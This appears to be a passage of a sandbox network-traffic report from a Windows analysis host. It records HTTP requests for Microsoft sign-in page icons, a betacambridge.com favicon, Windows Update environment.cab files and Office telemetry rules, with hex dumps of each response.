                                            2024-11-18 20:15:50 UTC416OUTGET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1
                                            Host: logincdn.msauth.net
                                            Connection: keep-alive
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            Accept: */*
                                            Sec-Fetch-Site: none
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: empty
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-11-18 20:15:51 UTC806INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:15:50 GMT
                                            Content-Type: image/svg+xml
                                            Content-Length: 276
                                            Connection: close
                                            Cache-Control: public, max-age=31536000
                                            Content-Encoding: gzip
                                            Last-Modified: Wed, 22 Jan 2020 00:38:00 GMT
                                            ETag: 0x8D79ED35591CF44
                                            x-ms-request-id: ac693482-901e-0056-18c2-3932b9000000
                                            x-ms-version: 2009-09-19
                                            x-ms-lease-status: unlocked
                                            x-ms-blob-type: BlockBlob
                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                            Access-Control-Allow-Origin: *
                                            x-azure-ref: 20241118T201550Z-16547b76f7f2b5qzhC1DFWeag400000004gg00000000cmcy
                                            x-fd-int-roxy-purgeid: 79218156
                                            X-Cache: TCP_HIT
                                            X-Cache-Info: L1_T2
                                            Accept-Ranges: bytes
                                            2024-11-18 20:15:51 UTC276INData Raw: 1f 8b 08 00 00 00 00 00 04 00 95 51 3d 6f c3 20 10 fd 2b 88 ae e6 e0 08 d8 b8 b2 3d 74 ca 90 ae 1d ba 45 8a 6b 5b 22 1f aa 91 c9 cf 2f 67 3b 6e 87 2c 15 f0 80 bb 7b ef 9e a0 1a a7 8e dd cf fe 32 d6 bc 0f e1 f6 2a 65 8c 11 e2 0e ae df 9d d4 4a 29 99 2a 38 8b c3 29 f4 35 d7 86 b3 be 1d ba 3e 2c e7 69 68 e3 db f5 5e 73 c5 14 d3 26 4d de 54 61 08 be 6d 8e e3 d8 86 b1 92 cb ad ba 1d 43 cf 4e 35 7f 47 97 21 82 2d dc 04 ce 98 7d 01 39 16 7e 07 a5 c6 8c d0 09 b0 a5 a1 75 c8 33 d4 de 40 69 8c 98 71 4b cc 9c 55 e5 93 b3 af c1 fb 9a bf 18 45 83 cb bf bd 14 f1 b2 02 94 cd fd 53 fa 1e ff ef e3 ac 04 a0 41 01 aa c0 b4 0e 36 95 97 a4 47 9b 05 67 1d 11 d6 2c 66 33 67 c1 35 46 1b b1 49 9d da d8 47 40 3c 0e 98 4c 2e 3a 60 b5 4e 26 01 3f 52 03 93 0c cf 89 64 b4 b0 28 08 37
                                            Data Ascii: Q=o +=tEk["/g;n,{2*eJ)*8)5>,ih^s&MTamCN5G!-}9~u3@iqKUESA6Gg,f3g5FIG@<L.:`N&?Rd(7


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            21192.168.2.449764192.232.223.484432084C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:15:51 UTC654OUTGET /wp-content/uploads/2020/06/cropped-Beta-cambridge-school-logo-1-32x32.png HTTP/1.1
                                            Host: www.betacambridge.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                            Sec-Fetch-Site: same-site
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: image
                                            Referer: https://betacambridge.com/
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-11-18 20:15:51 UTC232INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:15:51 GMT
                                            Server: Apache
                                            Upgrade: h2,h2c
                                            Connection: Upgrade, close
                                            Last-Modified: Tue, 16 Jun 2020 12:44:07 GMT
                                            Accept-Ranges: bytes
                                            Content-Length: 1651
                                            Content-Type: image/png
                                            2024-11-18 20:15:51 UTC1651INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 06 25 49 44 41 54 58 85 e5 97 7f 6c d4 67 1d c7 5f cf f3 7d ee 7b d7 eb 5d 0b 05 6b 7f 40 43 a0 c0 a8 08 05 b1 80 0c b3 90 0d 0b c3 b9 29 71 83 25 03 13 71 99 1a 8d a2 19 49 47 16 a2 73 33 26 92 30 74 cd 36 b2 64 38 dd ca 60 13 a7 ad 8e 10 82 a2 58 e5 87 63 c0 d1 00 ed da ee ca 6a af 5e e9 f5 7e 7e bf cf e3 1f 77 2d d7 d2 66 05 f7 c7 12 3f c9 37 77 79 ee fd bc 3f af e7 f3 7d 9e cf f7 7b f0 ff 1e e2 a3 30 b9 f6 ca 7e 3a ff 74 7c 86 1d ba b0 a1 20 91 5a 69 39 7a 86 c4 48 47 8a 70 a2 a0 e0 44 66 fe bc d7 17 3f b8 b9 d7 f3 c5 7b 3e 5a 80 53 87 fe 40 bc f1 97 6b 8a 22 91 c7 fc 83 b1 bb 94 76 6d
                                            Data Ascii: PNGIHDR szzpHYs+%IDATXlg_}{]k@C)q%qIGs3&0t6d8`Xcj^~~w-f?7wy?}{0~:t| Zi9zHGpDf?{>ZS@k"vm


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            22192.168.2.449763152.199.21.1754432084C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:15:51 UTC424OUTGET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1
                                            Host: aadcdn.msftauth.net
                                            Connection: keep-alive
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            Accept: */*
                                            Sec-Fetch-Site: none
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: empty
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-11-18 20:15:51 UTC738INHTTP/1.1 200 OK
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                            Age: 20616123
                                            Cache-Control: public, max-age=31536000
                                            Content-MD5: 1jQlecEJaGhFO2st5KXLhg==
                                            Content-Type: image/svg+xml
                                            Date: Mon, 18 Nov 2024 20:15:51 GMT
                                            Etag: 0x8DB5C3F4AC59B47
                                            Last-Modified: Wed, 24 May 2023 10:11:51 GMT
                                            Server: ECAcc (lhc/78BB)
                                            Vary: Accept-Encoding
                                            X-Cache: HIT
                                            x-ms-blob-type: BlockBlob
                                            x-ms-lease-status: unlocked
                                            x-ms-request-id: 2ee1dbb1-b01e-00dc-3276-7e9a59000000
                                            x-ms-version: 2009-09-19
                                            Content-Length: 1636
                                            Connection: close
                                            2024-11-18 20:15:51 UTC1636INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 38 2c 31 34 48 31 30 56 33 34 48 33 38 56 31 34 6d 32 2c 32 32 48 38 56 31 32 48 34 30 56 33 36 4d 31 37 2e 36 38 38 2c 31 38 2e 38 56 32 38 2e 38 32 38 48 31 35 2e 35 33 31 56 32 31 2e 32 33 34 61 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 2e 36 37 32 2e 34 33 6c 2d 2e 32 36 36 2e 31 31 37 61
                                            Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            23192.168.2.449768192.232.223.484432084C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:15:52 UTC418OUTGET /wp-content/uploads/2020/06/cropped-Beta-cambridge-school-logo-1-32x32.png HTTP/1.1
                                            Host: www.betacambridge.com
                                            Connection: keep-alive
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            Accept: */*
                                            Sec-Fetch-Site: none
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: empty
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-11-18 20:15:52 UTC232INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:15:52 GMT
                                            Server: Apache
                                            Upgrade: h2,h2c
                                            Connection: Upgrade, close
                                            Last-Modified: Tue, 16 Jun 2020 12:44:07 GMT
                                            Accept-Ranges: bytes
                                            Content-Length: 1651
                                            Content-Type: image/png
                                            2024-11-18 20:15:52 UTC1651INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 06 25 49 44 41 54 58 85 e5 97 7f 6c d4 67 1d c7 5f cf f3 7d ee 7b d7 eb 5d 0b 05 6b 7f 40 43 a0 c0 a8 08 05 b1 80 0c b3 90 0d 0b c3 b9 29 71 83 25 03 13 71 99 1a 8d a2 19 49 47 16 a2 73 33 26 92 30 74 cd 36 b2 64 38 dd ca 60 13 a7 ad 8e 10 82 a2 58 e5 87 63 c0 d1 00 ed da ee ca 6a af 5e e9 f5 7e 7e bf cf e3 1f 77 2d d7 d2 66 05 f7 c7 12 3f c9 37 77 79 ee fd bc 3f af e7 f3 7d 9e cf f7 7b f0 ff 1e e2 a3 30 b9 f6 ca 7e 3a ff 74 7c 86 1d ba b0 a1 20 91 5a 69 39 7a 86 c4 48 47 8a 70 a2 a0 e0 44 66 fe bc d7 17 3f b8 b9 d7 f3 c5 7b 3e 5a 80 53 87 fe 40 bc f1 97 6b 8a 22 91 c7 fc 83 b1 bb 94 76 6d
                                            Data Ascii: PNGIHDR szzpHYs+%IDATXlg_}{]k@C)q%qIGs3&0t6d8`Xcj^~~w-f?7wy?}{0~:t| Zi9zHGpDf?{>ZS@k"vm


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            24192.168.2.44976752.149.20.212443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:15:53 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=sf5TlgucR5x5beL&MD=9P9yO15X HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                            Host: slscr.update.microsoft.com
                                            2024-11-18 20:15:53 UTC560INHTTP/1.1 200 OK
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            Content-Type: application/octet-stream
                                            Expires: -1
                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                            ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                            MS-CorrelationId: c50ee907-1005-4807-a534-dad5589ac33c
                                            MS-RequestId: 09d92a7d-9ad9-4c5e-8bab-7701aa071e85
                                            MS-CV: sc/+lsO3gUOwQnT5.0
                                            X-Microsoft-SLSClientCache: 2880
                                            Content-Disposition: attachment; filename=environment.cab
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 18 Nov 2024 20:15:52 GMT
                                            Connection: close
                                            Content-Length: 24490
                                            2024-11-18 20:15:53 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                            Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                            2024-11-18 20:15:53 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                            Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            25192.168.2.44977452.149.20.212443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:31 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=sf5TlgucR5x5beL&MD=9P9yO15X HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                            Host: slscr.update.microsoft.com
                                            2024-11-18 20:16:31 UTC560INHTTP/1.1 200 OK
                                            Cache-Control: no-cache
                                            Pragma: no-cache
                                            Content-Type: application/octet-stream
                                            Expires: -1
                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                            ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                            MS-CorrelationId: d47736f6-1052-4eff-a749-3824806f6b5c
                                            MS-RequestId: 0e58b9e7-026d-4475-aaad-790eda926c1d
                                            MS-CV: JWhzKg12SECuMaHQ.0
                                            X-Microsoft-SLSClientCache: 1440
                                            Content-Disposition: attachment; filename=environment.cab
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 18 Nov 2024 20:16:31 GMT
                                            Connection: close
                                            Content-Length: 30005
                                            2024-11-18 20:16:31 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                            Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                            2024-11-18 20:16:31 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                            Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26192.168.2.44977513.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:35 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:35 UTC471INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:35 GMT
                                            Content-Type: text/plain
                                            Content-Length: 218853
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public
                                            Last-Modified: Sat, 16 Nov 2024 09:12:53 GMT
                                            ETag: "0x8DD061EDA65C651"
                                            x-ms-request-id: 1f2ca79a-801e-0015-0d8f-38f97f000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201635Z-1866b5c5fbbnjgfwhC1DFW3usc00000001hg00000000eabe
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:35 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                            Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                            2024-11-18 20:16:35 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                            Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                            2024-11-18 20:16:35 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                            Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                            2024-11-18 20:16:35 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                            Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                            2024-11-18 20:16:35 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                            Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
